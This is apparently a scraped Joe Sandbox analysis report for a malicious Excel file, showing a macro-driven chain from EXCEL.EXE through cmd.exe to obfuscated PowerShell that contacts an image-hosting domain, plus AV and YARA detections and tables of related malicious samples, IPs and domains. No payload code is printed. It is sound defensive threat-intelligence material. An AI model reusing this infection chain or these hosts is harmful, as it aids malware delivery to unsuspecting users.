Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 740517 Sample: 20310_011_11353_0_88.xls Startdate: 13/12/2018 Architecture: WINDOWS Score: 84 36 Antivirus detection for submitted file 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Obfuscated command line found 2->40 42 4 other signatures 2->42 9 EXCEL.EXE 75 34 2->9         started        process3 signatures4 44 Obfuscated command line found 9->44 46 Very long command line found 9->46 48 Document exploit detected (process start blacklist hit) 9->48 12 cmd.exe 9->12         started        process5 process6 14 cmd.exe 12->14         started        signatures7 52 Obfuscated command line found 14->52 54 Very long command line found 14->54 56 PowerShell case anomaly found 14->56 17 cmd.exe 14->17         started        20 cmd.exe 14->20         started        22 clip.exe 14->22         started        process8 signatures9 32 Obfuscated command line found 17->32 34 PowerShell case anomaly found 17->34 24 powershell.exe 50 6 17->24         started        process10 dnsIp11 28 images2.imgbox.com.sds.rncdn7.com 64.210.135.68, 443, 49211 SWIFTWILL2-SwiftwillIncUS United States 24->28 30 images2.imgbox.com 24->30 50 Powershell connects to network 24->50 signatures12

Simulations

Behavior and APIs

TimeTypeDescription
21:40:27API Interceptor4952x Sleep call for process: EXCEL.EXE modified
21:40:30API Interceptor1x Sleep call for process: clip.exe modified
21:40:33API Interceptor3x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
20310_011_11353_0_88.xls22%virustotalBrowse
20310_011_11353_0_88.xls9%metadefenderBrowse
20310_011_11353_0_88.xls100%AviraVBA/Dldr.Agent.yogrg

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000006.00000002.1249360856.012C0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000002.1249342410.006B0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1264839354.01CC0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1248635443.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000003.1249027719.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1263643081.01290000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1263634948.01287000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1248720839.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1248969895.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1263500876.00400000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1263628810.01280000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1248315695.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000002.1249262618.00340000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1264845731.01CC7000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
64.210.135.68Ft_000058_000_010994_10918.xlsf06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1maliciousBrowse
    Ft_000021_000_010695_10407.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
      DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
        DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
          Ft_000059_000_010075_10942.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
            DOC___.xlsc5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3amaliciousBrowse
              fatt F n.25570 2018.xls321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5maliciousBrowse
                3D0971 DOC20181101126.xls003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361maliciousBrowse
                  3D0971 DOC20181101126.xls003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361maliciousBrowse
                    Ft_000059_000_010075_10942.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      images2.imgbox.com.sds.rncdn7.comFt_000058_000_010994_10918.xlsf06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1maliciousBrowse
                      • 64.210.135.68
                      Ft_000021_000_010695_10407.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.68
                      8730944.xlsbfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668maliciousBrowse
                      • 64.210.135.72
                      DOC___.xlsc5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3amaliciousBrowse
                      • 64.210.135.70
                      Ft_000021_000_010695_10407.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.72
                      36Ft_000074_000_010126_10639.xls6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353emaliciousBrowse
                      • 64.210.135.72
                      DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
                      • 64.210.135.68
                      DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
                      • 64.210.135.68
                      8730944.xlsbfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668maliciousBrowse
                      • 64.210.135.72
                      20181106xxxxx.xls81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804maliciousBrowse
                      • 64.210.135.70
                      Ft_000059_000_010075_10942.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.68
                      Ft_000058_000_010994_10918.xlsf06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1maliciousBrowse
                      • 64.210.135.70
                      52fatt F n.49198 2018.xlsae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0maliciousBrowse
                      • 64.210.135.70
                      52fatt F n.49198 2018.xlsae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0maliciousBrowse
                      • 64.210.135.70
                      fatt F n.25570 2018.xls321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5maliciousBrowse
                      • 64.210.135.70
                      DOC___.xlsc5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3amaliciousBrowse
                      • 64.210.135.68
                      fatt F n.25570 2018.xls321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5maliciousBrowse
                      • 64.210.135.68
                      36Ft_000074_000_010126_10639.xls6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353emaliciousBrowse
                      • 64.210.135.70
                      3D0971 DOC20181101126.xls003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361maliciousBrowse
                      • 64.210.135.68
                      20181106xxxxx.xls81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804maliciousBrowse
                      • 64.210.135.70

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      SWIFTWILL2-SwiftwillIncUSFt_000058_000_010994_10918.xlsf06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1maliciousBrowse
                      • 64.210.135.68
                      Ft_000021_000_010695_10407.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.68
                      8730944.xlsbfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668maliciousBrowse
                      • 64.210.135.72
                      DOC___.xlsc5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3amaliciousBrowse
                      • 64.210.135.70
                      Ft_000021_000_010695_10407.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.72
                      36Ft_000074_000_010126_10639.xls6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353emaliciousBrowse
                      • 64.210.135.72
                      DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
                      • 64.210.135.68
                      DOC2410201810129420.xls54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2emaliciousBrowse
                      • 64.210.135.68
                      8730944.xlsbfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668maliciousBrowse
                      • 64.210.135.72
                      20181106xxxxx.xls81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804maliciousBrowse
                      • 64.210.135.70
                      ne4zvSJk0V.apkb9985334412f3ee2b84fa5152384be7a0906afad62ac3e843499a48e2b28e8e9maliciousBrowse
                      • 94.199.253.33
                      oTv8gvbipf.apk32ba51b250f73f29f47269d7edbc3982e1f864d6604f4396e58eaf9cb1b0194dmaliciousBrowse
                      • 94.199.253.33
                      Ft_000059_000_010075_10942.xls0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540maliciousBrowse
                      • 64.210.135.68
                      Ft_000058_000_010994_10918.xlsf06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1maliciousBrowse
                      • 64.210.135.70
                      52fatt F n.49198 2018.xlsae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0maliciousBrowse
                      • 64.210.135.70
                      52fatt F n.49198 2018.xlsae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0maliciousBrowse
                      • 64.210.135.70
                      fatt F n.25570 2018.xls321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5maliciousBrowse
                      • 64.210.135.70
                      DOC___.xlsc5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3amaliciousBrowse
                      • 64.210.135.68
                      fatt F n.25570 2018.xls321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5maliciousBrowse
                      • 64.210.135.68
                      36Ft_000074_000_010126_10639.xls6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353emaliciousBrowse
                      • 64.210.135.70

                      Dropped Files

                      No context

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.